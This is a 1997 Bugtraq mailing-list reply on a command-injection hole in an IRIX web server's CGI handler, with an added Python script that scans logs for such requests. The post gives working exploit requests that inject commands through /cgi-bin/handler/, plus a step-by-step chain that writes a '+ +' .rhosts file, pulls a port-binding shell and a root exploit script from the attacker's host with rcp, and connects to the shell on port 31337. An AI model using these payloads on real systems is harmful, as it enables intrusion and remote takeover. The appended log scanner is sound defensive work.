Bugtraq mailing list archives
Re: CPSR 7: IRIX WWW Server
From: aaronb () j51 com (Aaron Bornstein)
Date: Thu, 24 Jul 1997 12:59:54 -0400
On Thu, 24 Jul 1997, Thomas Walter wrote: [snip]
> enemy% telnet victim 80
> Trying 1.2.3.4...
> Connected to victim.
> Escape character is '^]'.
> GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e /bin/csh|?data=Download
> UX:sh (sh): ERROR:
> Connection closed by foreign host.
> enemy%
>
> And voila! - What else do you want? Any other programs to start? Just try...
Keep in mind that it isn't necessary to get everything done in one command. A string of two or three commands might sometimes be necessary to get things moving. For example:

enemy% whoami
evil_cracker
enemy% echo + + > .rhosts
enemy% nc victim.com 80
GET /cgi-bin/handler/;/usr/bsd/rcp evil_cracker@enemy.com:portshell /tmp|?data=Download
enemy% nc victim.com 80
GET /cgi-bin/handler/;/tmp/portshell 31337|?data=Download
enemy% nc victim.com 31337
% whoami
nobody
% rcp evil_cracker@enemy.com:irix_root_bug_of_the_week.sh \
  ./irbotw.sh ; ./irbotw.sh
# [... or whatever ...]

"portshell" being a program that bound itself to a TCP port and executed a shell upon receiving a connection. Boom, shell access obtained under whatever uid httpd is running as. Or, one could even create a dummy inetd.conf and run their own copy of inetd. The possibilities are virtually limitless.

--Aaron

- -- --- ---- - Aaron Bornstein : aaronb at j51 dot com - ---- --- -- -
Never let your schooling interfere with your education
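
A detection-side illustration of the request shape shown in this message (an added example, not part of the original post or thread): scanning Common Log Format access logs for CGI requests whose path carries shell metacharacters. The log format, the sample lines and the function names are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request line" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*)" \d{3} \S+$')
# Characters the shell treats as separators, pipes, substitution or redirects.
SHELL_META = re.compile(r'[;|&`$<>\r\n]')

def request_target(request_line):
    """Return the raw request target, keeping any embedded spaces.

    Request lines of the kind shown in the post contain raw spaces and may
    carry no HTTP version, so a three-way split on whitespace truncates them.
    """
    method, sep, rest = request_line.partition(" ")
    if not sep or method not in ("GET", "HEAD", "POST"):
        return None
    return re.sub(r" HTTP/\d\.\d$", "", rest)  # drop the version only if present

def flag_cgi_metachar_requests(lines, cgi_prefix="/cgi-bin/"):
    """Return (client, decoded_path) for CGI requests with shell metacharacters in the path."""
    hits = []
    for line in lines:
        m = CLF.match(line.strip())
        target = request_target(m.group(2)) if m else None
        if target is None:
            continue
        # Split on the first literal '?' as the server does, then decode the
        # path twice so %3B and double-encoded %253B are both seen as ';'.
        path = unquote(unquote(target.split("?", 1)[0]))
        if path.startswith(cgi_prefix) and SHELL_META.search(path):
            hits.append((m.group(1), path))
    return hits

# Constructed sample log lines (documentation addresses, harmless commands).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jul/1997:12:01:07 -0400] "GET /index.html HTTP/1.0" 200 2326',
    '192.0.2.66 - - [24/Jul/1997:12:03:41 -0400] "GET /cgi-bin/handler/;/bin/ls /tmp|?data=Download" 200 0',
    '192.0.2.66 - - [24/Jul/1997:12:04:02 -0400] "GET /cgi-bin/handler/%3B/bin/id%7C?data=Download HTTP/1.0" 200 0',
    '192.0.2.10 - - [24/Jul/1997:12:05:30 -0400] "GET /cgi-bin/search?q=a;b HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for client, path in flag_cgi_metachar_requests(SAMPLE_LOG):
        print(f"{client}\t{path!r}")
```

The check looks only at the path portion, since that is where the requests in this thread carry the command; a ';' inside a query string, as in the last sample line, is not flagged.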